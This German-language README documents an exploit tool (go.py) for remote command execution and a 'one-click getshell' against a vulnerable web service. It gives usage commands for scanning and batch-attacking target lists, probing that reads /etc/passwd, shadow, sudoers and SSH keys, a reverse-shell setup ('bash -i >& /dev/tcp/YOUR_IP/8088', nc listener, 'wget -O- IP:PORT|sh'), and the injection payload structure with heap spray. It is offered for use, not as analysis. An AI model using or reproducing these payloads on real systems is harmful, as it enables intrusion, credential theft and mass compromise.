
Enthält die Erkennung ausführbarer Befehle und Ein-Klick-Getshell (erfordert die Bereitstellung eines Dienstes auf dem Server)
Beinhaltet ausführbare Befehlserkennung und One-Click-Getshell (erfordert Serverbereitstellungsdienst) pco.yaml kann in Kombination mit nuclei schnell scannen
python go.py
Ziel-URL eingeben → Funktionsmenü auswählen.
# Schneller Scan (8 grundlegende Informationen)
python go.py -t https://IP:PORT --probe fast
# Tiefer Scan (alle Befehle: 30+ Elemente)
python go.py -t https://IP:PORT --probe deep
# Batch-Scan
python go.py -f vulnerable_targets.txt --probe fast
python go.py -t https://IP:PORT -c "hostname"
python go.py -t https://IP:PORT -c "ls -la /root"
python go.py -t https://IP:PORT -c "cat /etc/passwd"
# Batch parallel (20 Threads)
python go.py -f targets.txt -c "hostname" --batch 20
Auf dem Angreifer zwei Terminals öffnen:
# Terminal 1 - HTTP-Dienst (stellt rev.sh bereit)
echo 'bash -i >& /dev/tcp/YOUR_IP/8088 0>&1' > index.html
python3 -m http.server 8087
# Terminal 2 - Warten auf Reverse Shell
nc -lvnp 8088
Dann Payload senden:
# Einzelziel
python go.py -t https://IP:PORT -l YOUR_IP -p 8087 -n 8088
# Batch (seriell, nur einer nach dem anderen)
python go.py -f targets.txt -l YOUR_IP -p 8087 -n 8088
Das Skript druckt vor dem Senden die Vorbereitungsschritte.
| Kategorie | Befehl |
|---|---|
| Grundlegende Informationen | hostname, uname -a, kernel, OS release, uptime |
| Benutzer | id, whoami, users/w/who |
| Netzwerk | ifconfig, route, arp, listening ports, connections, iptables |
| System | processes, cpuinfo, meminfo, disk, mount |
| Dateien | ls / /root /tmp /home /etc |
| Konfiguration | crontab, passwd, shadow, sudoers, SSH keys |
| Erweiterungen | config search, scripts, docker, containers |
{"cmd":"getall","apiuser":"''''","apipass":"BBBBB",
"g0":"AAAAAAAAAAAAAAAA'; <Befehl> #", ...}
apiuser="''''" löst den Fehler aus, dass escape_quotes() nicht mit null terminiert wirdg0~g60 Heap Spray 61 Mal, erhöht Erfolgsrate'; <Befehl> # schließt Kontext, # kommentiert RestOhne echo tag verfügbar 34 Zeichen:
wget -O- IP:PORT|sh (31 Zeichen)
Pipe-Kette: wget herunterladen → sh ausführen → bash Reverse Shell zurück zum angegebenen Port.
| Parameter | Funktion |
|---|---|
-t, --target URL | Zieladresse |
-f, --file FILE | Ziellistendatei |
-l, --lhost IP | Angreifer-IP |
-p, --lport PORT | HTTP-Dienst-Port (Standard 8087) |
-n, --ncport PORT | nc-Listening-Port (Standard 8088) |
-c, --cmd CMD | Befehl ausführen |
--probe fast/deep | Schneller/Tiefer Scan |
--batch N | Batch-Parallelität (Standard seriell) |